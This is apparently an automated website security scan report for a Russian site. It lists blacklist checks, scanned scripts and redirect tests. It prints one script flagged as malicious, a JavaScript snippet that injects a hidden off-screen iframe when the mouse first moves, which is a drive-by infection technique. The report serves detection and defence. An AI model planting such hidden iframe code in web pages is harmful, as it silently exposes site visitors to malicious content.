Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pu50.bakal1.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pu50.bakal1.ru/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status
http://pu50.bakal1.ru/ | 200 OK Content-Length: 23973 Content-Type: text/html | clean |
http://pu50.bakal1.ru/./jquery-1.4.2.min.js | 200 OK Content-Length: 72174 Content-Type: application/javascript | clean |
http://pu50.bakal1.ru/./fancybox/jquery.easing-1.3.pack.js | 200 OK Content-Length: 6717 Content-Type: application/javascript | clean |
http://pu50.bakal1.ru/./fancybox/jquery.fancybox-1.3.0.pack.js | 200 OK Content-Length: 15071 Content-Type: application/javascript | clean |
http://pu50.bakal1.ru/./fancybox/jquery.mousewheel-3.0.2.pack.js | 200 OK Content-Length: 1157 Content-Type: application/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21183 Content-Type: text/javascript | clean |
http://www.clocklink.com/embed.js | 200 OK Content-Length: 2949 Content-Type: text/javascript | clean |
http://feelthesame.changeip.name/rsize.js | 200 OK Content-Length: 405 Content-Type: application/x-javascript | malicious |
Malicious code (confirmed by antiviruses, see below):
    res='Ошибка MySQL';
    var astatf = 0;
    document.write("<head></head><b><div id='staticaccoin'></div></b>");
    document.onmousemove=moveonlinetest;
    function moveonlinetest() {
        if (astatf == 0) {
            astatf++;
            text = "<iframe src='"+res+"' width='10' height='16' style='position: absolute; z-index: 1; left: -1000px; top: -1000px;'></iframe>";
            document.getElementById("staticaccoin").innerHTML = text
        }
    }
Antivirus reports:
http://pu50.bakal1.ru/index.php?start_from=7&ucat=&archive=&subaction=&id=& | 200 OK Content-Length: 24119 Content-Type: text/html | clean |
http://pu50.bakal1.ru/index.php?start_from=0&ucat=&archive=&subaction=&id=& | 200 OK Content-Length: 23973 Content-Type: text/html | clean |
http://pu50.bakal1.ru/index.php?start_from=14&ucat=&archive=&subaction=&id=& | 200 OK Content-Length: 24201 Content-Type: text/html | clean |
http://pu50.bakal1.ru/index.php?start_from=21&ucat=&archive=&subaction=&id=& | 200 OK Content-Length: 23724 Content-Type: text/html | clean |
http://pu50.bakal1.ru/./news.php | 200 OK Content-Length: 185174 Content-Type: text/html | clean |
http://www.calend.ru/img/export/informer_new_theme1.js? | 200 OK Content-Length: 2856 Content-Type: application/x-javascript | clean |
http://pu50.bakal1.ru/news.php?subaction=showfull&id=1336027592&archive=&start_from=&ucat=3& | 200 OK Content-Length: 36901 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pu50.bakal1.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Aug 2014 15:43:19 GMT
Server: nginx/1.6.0
Content-Type: text/html
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: pu50.bakal1.ru
Referer: http://www.google.com/search?q=pu50.bakal1.ru
Result:
The result is similar to the first query; no suspicious redirects were found.